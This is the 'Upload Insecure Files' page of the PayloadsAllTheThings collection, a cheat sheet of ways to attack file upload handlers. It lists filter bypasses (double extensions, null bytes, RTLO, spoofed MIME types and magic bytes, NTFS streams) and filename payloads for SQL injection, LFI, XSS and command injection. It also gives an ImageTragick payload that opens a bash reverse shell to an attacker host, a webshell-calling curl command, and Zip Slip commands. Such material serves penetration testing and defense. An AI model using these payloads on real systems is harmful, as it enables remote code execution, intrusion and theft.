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PayloadsAllTheThings/Upload Insecure Files
2022-01-01 11:48:07 +01:00
Configuration Apache .htaccess
Configuration Busybox httpd.conf
Configuration IIS web.config
Configuration Python __init__.py
CVE Ffmpeg HLS
CVE ZIP Symbolic Link
Extension ASP
Extension Flash
Extension HTML
Extension PDF JS
Extension PHP
Picture Image Magik
Picture Metadata
Picture Resize
Server Side Include
Zip Slip


Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.




Defaults extensions

  • PHP Server
    # Less known PHP extensions
  • ASP Server : .asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)
  • JSP : .jsp, .jspx, .jsw, .jsv, .jspf
  • Perl: .pl, .pm, .cgi, .lib
  • Coldfusion: .cfm, .cfml, .cfc, .dbm

Upload tricks

  • Use double extensions : .jpg.php
  • Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): .php.jpg
  • Mix uppercase and lowercase : .pHp, .pHP5, .PhAr
  • Null byte (works well against pathinfo())
    • .php%00.gif
    • .php\x00.gif
    • .php%00.png
    • .php\x00.png
    • .php%00.jpg
    • .php\x00.jpg
  • Special characters
    • Multiple dots : file.php...... , in Windows when a file is created with dots at the end those will be removed.
    • Whitespace characters: file.php%20
    • Right to Left Override (RTLO): name.%E2%80%AEphp.jpg will became name.gpj.php.
  • Mime type, change Content-Type : application/x-php or Content-Type : application/octet-stream to Content-Type : image/gif
    • Content-Type : image/gif
    • Content-Type : image/png
    • Content-Type : image/jpeg
    • Set the Content-Type twice: once for unallowed type and once for allowed.
  • Magic Bytes
    • Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
      • PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[
      • JPG: \xff\xd8\xff
      • GIF: GIF87a OR GIF8;
    • Shell can also be added in the metadata
  • Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character ":" will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. "file.asax:.jpg"). This file might be edited later using other techniques such as using its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "file.asp::$data.")

Filename vulnerabilities

  • Time-Based SQLi Payloads: e.g. poc.js'(select*from(select(sleep(20)))a)+'.extension
  • LFI Payloads: e.g. image.png../../../../../../../etc/passwd
  • XSS Payloads e.g. '"><img src=x onerror=alert(document.domain)>.extension
  • File Traversal e.g. ../../../tmp/lol.png
  • Command Injection e.g. ; sleep 10;

Picture upload with LFI

Valid pictures hosting PHP code. Upload the picture and use a local file inclusion to execute the code. The shell can be called with the following command : curl 'http://localhost/test.php?0=system' --data "1='ls'".

  • Picture Metadata, hide the payload inside a comment tag in the metadata.
  • Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating getimagesize() and imagecreatefromgif().

Configuration Files

If you are trying to upload files to a PHP server, take a look at the .htaccess trick to execute code. If you are trying to upload files to an ASP server, take a look at the .config trick to execute code.

Configuration files examples

  • .htaccess
  • web.config
  • httpd.conf
  • __init__.py

CVE - Image Tragik

Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1)

push graphic-context
viewbox 0 0 640 480
fill 'url("|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context

More payload in the folder Picture Image Magik

CVE - FFMpeg

FFmpeg HLS vulnerability

ZIP archive

When a ZIP/archive file is automatically decompressed after the upload

  • Zip Slip: directory traversal to write a file somewhere else
    python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15
    ln -s ../../../index.php symindex.txt
    zip --symlinks test.zip symindex.txt
